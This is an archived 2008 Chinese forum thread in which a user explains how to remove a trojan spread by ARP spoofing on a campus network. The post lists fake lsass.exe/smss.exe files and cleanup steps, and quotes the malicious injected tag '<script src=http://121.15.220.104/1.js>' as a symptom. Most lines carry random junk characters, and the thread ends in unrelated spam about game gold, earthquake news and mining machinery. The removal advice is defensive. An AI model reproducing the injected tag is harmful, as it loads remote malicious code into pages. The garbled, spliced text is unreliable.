局域网ARP攻击克星：Lsass.exe和smss.exe木马病毒(变身广告A)查杀(页 1) - 电脑综合区 - 育学网社区考研,高考,新英语四六级,升本,电脑网络,IT认证,资格认证,校园信息,考试政策,教育制度

失业的猪 发表于 2008-1-8 20:15

局域网ARP攻击克星：Lsass.exe和smss.exe木马病毒(变身广告A)查杀

前几天在龙族、萧心、剑盟发过此贴，但是发现还是有很多朋友在与此病毒“奋战 ”就把帖子转过来了，希望对大家有所帮助。 fRa+hj,JCD|

我是校园网用户，最近局域网内arp欺骗很严重，有不少人中招，而且中毒者的症状和严重程度各不相同，查杀时情况也有所不同，下面是我查杀Lsass.exe和smss.exe木马病毒（变身广告A）时的过程和一些心得，希望对大家有所帮助，如有更好的方法请多指教。"^#P(Xa3]s2}N!B|
b!AD4\KV
中毒程度基本可分为两种情况，暂且将其称为初级状态和高级状态吧。

一、初级状态Wa+i(@^A\
初级状态症状：S"h!~D:\4i7f)k
1、打开任意网页随机在其源代码内加入<script src=http://121.15.220.104/1.js></script>代码（或其他类似地址的代码），表现为或是在网页顶部出现一google广告，或是在网页右下角出现一类似QQ系统广告之类的东西，但是关闭不掉，点击也无其他反应。SR6C9z5w"`E
2、打开任意网页下载东西时自动将下载的东西替换为setup.exe自解压程序，大小为80多K，下载来自121.15.220.104（或其他），关闭此下载重新点击，第二次下载的才是你要下载的正确文件u5G/{!u%eZ t3Y]
3、生成两个进程Lsass.exe和Smss.exe，与系统进程名字相同，只不过用户名不是system，而是你的用户名。rq/iKZ7Da4|
4、生成以下病毒文件
   C:\Windows\system32\Com\lsass.exe.~1{?9}O]
   C:\Windows\system32\Com\smss.exeB EU;[N,L
   C:\Windows\system32\drivers\alg.exe
   C:\Windows\system32\Com\netcfg.dll
   X:\AUTORUN.INFrT3` Nd.Zi9y
   X:\pagefile.pif
  “X”为你的所有盘符j4P-_%}*B:d k-\
5、可以查看一般隐藏文件，但是无法查看受保护的系统隐藏文件（在“工具—文件夹选项—查看”里看不到“隐藏受保护的操作系统文件”）
6、安全模式进不去
7、一些杀软或流氓清除工具可以查出有恶意广告插件，但是无法清除
8、由于病毒在每个盘符下都生成病毒文件，所以简单的重装系统基本没用
9、此病毒会感染其他盘下的部分exe文件（感染后的exe文件图标和感染前的图标略有不同，可以看出来），所以即使杀过之后也不要大意，运行感染后的文件时卡巴会提示。

初级状态查杀方法：0~M[;XdL
初级状态查杀比较容易，用两个工具即可：IceSword和PowerRmv

1、运行冰刃IceSword，结束假冒系统文件的病毒（Lsass.exe和smss.exe），注意，路径在C:\Windows\system32\Com\下mW+@Hm[
2、打开PowerRmv.exe，选上“清除并且抑制文件再次生成”，依次填入以下内容并开始：Qnq2}y8L`&d\/w
   C:\Windows\system32\Com\lsass.exe
   C:\Windows\system32\Com\smss.exe9LGf3DZ-?3lQ
   C:\Windows\system32\drivers\alg.exe
   C:\Windows\system32\Com\netcfg.dll-r}O8n4C!aK
   X:\AUTORUN.INF t7E/O&S;WVhF,K
   X:\pagefile.pif
其中“X”为你的所有盘符
3、升级杀毒软件至最新病毒库全盘查杀。

二、高级状态症状：L"~&w-xWN uY @4\.[
高级状态也有两种程度不同的情况：
1、具备初级状态的所有症状，但此时IceSword.exe无法正常运行，一运行就自动退出。不管他，直接运行PowerRmv.exe，具体操作同上，将“开始—所有程序—启动”项里的无关项删掉，把msconfig里把无关启动项禁用，注销或重启后升级杀毒软件至最新病毒库全盘查杀。-\ yP+PM c1l0JX J
2、具备初级状态的所有症状；,O3H$zZ3cBpbK*w
IceSword.exe无法正常运行；} p*L |-yL:@8i#E!g)f
用PowerRmv.exe删除C:\Windows\system32\Com\lsass.exe时系统自动重启；/yt]k9C)UHG
另外还发现此高级状态时该木马还与360卫士有仇，或360卫士不能正常运行，或360卫士不能正常安装，或360卫士一安装就自动重启，更厉害的是一打开360卫士的网页，浏览器就自动关闭。v'Kn-^eWMh
此时我只能提供一种思路供参考：将IceSword改为其他名字，将后缀.exe改为.com，&z]"n-dZ`:d
如果此时还是不行，那我就没办法了，似乎只有重装系统了（如果谁有更好的方法请多指教），但要注意的是重装系统前先用PowerRmv.exe将其他盘的病毒文件清除掉，不要进行其他的操作马上重装。YuQ6kbHZg4_+O

三、一点小建议：+B KH,|AFqk'd6o
1、无论是以上哪种情况，手动删除病毒文件后都升级杀毒软件至最新病毒库全盘查杀，因为可能还有其他的被感染的文件*oR)mG.[:`0[
2、如果你不是高手，最好不要裸奔上网，尽量装个强一点的杀毒软件y!n+Vg3T/gP)C
3、也不要过分依赖杀软，上网时小心仔细点，如下载东西时注意文件的大小和名字是否是你要下载的文件
4、最好在初装系统时给系统做个ghost，省的特殊情况下重装系统时浪费大量时间
5、此病毒好像比较忌讳360卫士，手动杀完毒后不妨再用360卫士扫描下（为什么360卫士不学下卡巴的自我保护功能，如此轻而易举的就被病毒破坏掉了）

以下是IceSword和PowerRmv的附件+QJ |2DB0p#P!?
***********************************************************************************@A HEwG
[color=red]2007.12.18新增：)xW0tgk6Y
[/color]发现有的机子上尽管暂时将病毒杀掉了，但是还是有被感染的exe文件（兵刃也会被感染），运行后依然会再次中毒，360将此病毒命名为变身广告A，算是威金的一个变种，提供几个工具使用（其中[color=red]威金熊猫通用终结器[/color]可修复被感染的exe文件），不妨全部使用一遍。H/B'D#H"F3Lf7s
***********************************************************************************
[color=red]2007.12.21补充：
[/color]强烈建议校园网用户装个arp防火墙，推荐“ARP防火墙单机版5.01”
下载地址：[url=http://www.onlinedown.net/soft/52718.htm]http://www.onlinedown.net/soft/52718.htm[/url]
{5lHf/pDH
[attach]1272[/attach]
-NB}6y1b)@b0Vn
[attach]1273[/attach]&{|2s'OBio
+f(}yJ&v Zk!W
[attach]1274[/attach]A8t ~1l@U|vn
qU'T;FL+k9O@
[attach]1275[/attach]

[attach]1276[/attach]-XXR^{Ht/YOb#i

4??} h1l
[attach]1277[/attach]

失业的猪 发表于 2008-1-8 20:16

再写个杀毒步骤吧（已添加到贴中IceSword&PowerRmv附件中）
8`/wNK-E:Z#N{q
1、运行冰刃“IceSword”，结束假冒系统文件的病毒（Lsass.exe和smss.exe）
注意，路径在C:\Windows\system32\Com\下（如果兵刃不能运行可直接进入下一步）
4|x@8H]![
2、打开“PowerRmv”，选上“抑制杀灭对象再次生成”，依次填入下面内容后，确定：
C:\Windows\system32\Com\lsass.exe
C:\Windows\system32\Com\smss.exe? d/J:mo4o"F8m?/^
C:\Windows\system32\drivers\alg.exe|~R$R E7nbr
C:\Windows\system32\Com\netcfg.dll |fQ(c]O!S&r#pt
X:\AUTORUN.INF!E^8x @.Y"L Z1vL
X:\pagefile.pifFt?I:ls*}
注意：X为你的所有盘符，依次替换为C、D、E、F……h-^,t9W/O3D4E*|

3、删除文件：qD.IX2};K [u
C:\Documents and Settings\当前用户名\「开始」菜单\程序\启动\~.pif或为其他。

4、运行威金熊猫通用终结器，全盘扫描。
VO.UT+}y)K+y\'RT
5、运行变身广告A免疫，程序会自动删除当前临时文件，时间可能会长些。7yyX?}4m
Vdj)@[jqW
6、依次运行显示隐藏文件、显示受保护的系统隐藏文件、安全模式进不去三个修复程序，双击导入注册表即可。

8、重新安装360安全卫士扫描下系统插件。
B7I;q Yv`(QXv
9、强烈建议安装“antiarp防火墙”，下载地址：[url]http://www.onlinedown.net/soft/52718.htm[/url]

7、重新安装杀毒软件，以前的杀软可能被感染了。强烈建议升级至最新病毒库后全盘扫描。

goleveling 发表于 2008-5-26 02:25

央视落泪主播坦言最想去抗震前线

Web page: [b][size=6][url=http://veryge.com/]world of warcraft gold[/url] [/size][/b]
[b][size=6][url=http://goleveling.com/]guild wars gold[/url][/size][/b]9X*it9^;j`,F k
[b][size=6][url=http://goleveling.com/]ffxi gil[/url][/size][/b]j ?U zLN*a
[b][size=6][url=http://veryge.com/]buy wow gold[/url][/size][/b]
[b][size=6][url=http://goleveling.com/]buy wow gold[/url][/size][/b]
5月14日,央视主持人赵普在直播“抗震救灾”节目时,感动之余落下了男儿泪,他的热泪打动了亿万观众。大家议论的不是赵普的一时失态,更多的是赞扬声。日前,擦干眼泪接受记者采访的他同样是真情流露,他坦言：“我最想去抗震前线,放心不下那些灾区的儿童。”-H0p [wl0vcE

心中全是悲痛 fX2G J*J aD

当记者谈到观众对他的极大关注时,赵普很谦虚：“我的个人表现不值得一提”。赵普说,5月12日大地震发生后,台里立即作出了反应,迅速组织力量,派出记者前往灾区进行直播报道。“当我们在演播室里拿到前方同事传回来的信息时,真有些手足无措,特别是看到不断攀升的死亡数字,那几天完全是在震惊,担忧中度过的。”在赵普的回忆中,那几天的压力非常大。

5月14日,震后第三天,当情感激烈聚积的赵普不断接到伤亡消息时,赵普悲痛的泪水不禁夺眶而出。“我首先是一个人,然后才是传媒人！当时在节目中我实在是说不出话来了。”谈及当时的感受,他这样告诉记者。

选矿环球 发表于 2008-6-3 20:19

鄂式破碎机

郑州环球重工机械有限公司专业生产：[url=http://www.hqzg.net/qiumoji.htm]球磨机[/url]、破碎机、[url=http://www.hqzg.net/eshiposuiji.htm]鄂式破碎机[/url]、锤式破碎机、反击式破碎机、复合式破碎机、直通冲击式破碎机等矿山机械，欢迎广大用户前来咨询洽谈。
[b]联系方式:[/b]K.~ o6~OwG(F*S
地址：郑州市南阳路216号
电话：86-371-67878896
传真：86-371-67823216 gx u(S3\
E-mail:[email=huanqiuzg@gmail.com]huanqiuzg@gmail.com[/email]

页: [1]

育学网社区's Archiver